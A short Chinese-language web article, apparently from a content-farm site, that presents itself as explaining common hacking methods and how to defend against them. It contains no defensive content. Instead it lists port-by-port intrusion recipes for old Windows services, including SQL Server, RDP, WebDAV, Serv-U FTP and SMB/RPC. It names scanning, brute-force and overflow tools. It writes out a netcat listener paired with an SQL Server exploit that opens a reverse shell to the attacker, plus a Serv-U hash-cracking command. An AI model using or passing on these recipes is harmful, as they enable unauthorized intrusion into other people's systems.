常見的黑客入侵方法與防范
常見的黑客入侵方法與防范
本文簡單介紹目前黑客最常使用的一些入侵工具及防御的方法,希望能對大家有所幫助,以助于大家能更好地防御黑客的攻擊,下面學(xué)習(xí)啦小編來告訴你吧!
1. 利用4899端口入侵
4899端口是一個遠(yuǎn)程控制軟件(remote administrator)服務(wù)端監(jiān)聽的端口,他不能算是一個木馬程序,但是具有遠(yuǎn)程控制功能,通常殺毒軟件是無法查出它來的
用4899過濾器.exe,掃描空口令的機(jī)器
2. 利用3899的入侵
對很早的機(jī)器,可以試試3389的溢出
對2000的機(jī)器,可以試試字典暴破。
3.利用1433端口入侵
1433端口,是SQL Server默認(rèn)的端口,SQL Server服務(wù)使用兩個端口:TCP-1433、UDP-1434。其中1433用于供SQL Server對外提供服務(wù),1434用于向請求者返回SQL Server使用了哪個TCP/IP端口。
scanport.exe 查有1433的機(jī)器
SQLScanPass.exe 進(jìn)行字典暴破(字典是關(guān)鍵)
最后 SQLTools.exe入侵
對sql的sp2及以下的系統(tǒng),可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本機(jī)端口 sqlhelloF.exe 入侵ip 1433 本機(jī)ip 本機(jī)端口
(以上反向的,測試成功)
sqlhelloz.exe 入侵ip 1433 (這個是正向連接)
4. 利用80端口入侵
80端口是為HTTP(HyperText Transport Protocol)即超文本傳輸協(xié)議開放的,此為上網(wǎng)沖浪使用次數(shù)最多的協(xié)議,主要用于WWW(World Wide Web)即萬維網(wǎng)傳輸信息的協(xié)議。可以通過HTTP地址(即常說的“網(wǎng)址”)加“:80”來訪問網(wǎng)站,因為瀏覽網(wǎng)頁服務(wù)默認(rèn)的端口號都是80,因此只需輸入網(wǎng)址即可,不用輸入“:80”了。
對sp3以前的機(jī)器,可以用webdav入侵;
對bbs論壇,可以試試上傳漏洞(upfile.exe或dvup_delphi.exe)
可以利用SQL進(jìn)行注入。(小榕的注入軟件)。
5. 利用serv-u入侵(21端口)
21端口主要用于FTP(File Transfer Protocol,文件傳輸協(xié)議)服務(wù),F(xiàn)TP服務(wù)主要是為了在兩臺計算機(jī)之間實現(xiàn)文件的上傳與下載,一臺計算機(jī)作為FTP客戶端,另一臺計算機(jī)作為FTP服務(wù)器,可以采用匿名(anonymous)登錄和授權(quán)用戶名與密碼登錄兩種方式登錄FTP服務(wù)器。
對5. 004及以下系統(tǒng),可用溢出入侵。(serv5004.exe)
對5.1.0.0及以下系統(tǒng),可用本地提升權(quán)限。(servlocal.exe)
對serv-u的MD5加密密碼,可以用字典暴破。(crack.vbs)
輸入一個被serv-u加密的密碼(34位長),通過與字典檔(dict.txt)的比較,得到密碼。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A
6. 利用554端口
用real554.exe入侵。
7. 利用6129端口
用DameWare6129.exe入侵。
8. 利用系統(tǒng)漏洞
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,
進(jìn)行溢出入侵。
9. 利用3127等端口
可以利用doom病毒開的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。
10. 利用其他入侵
利用shanlu的入侵軟件入侵(WINNTAutoAttack.exe)。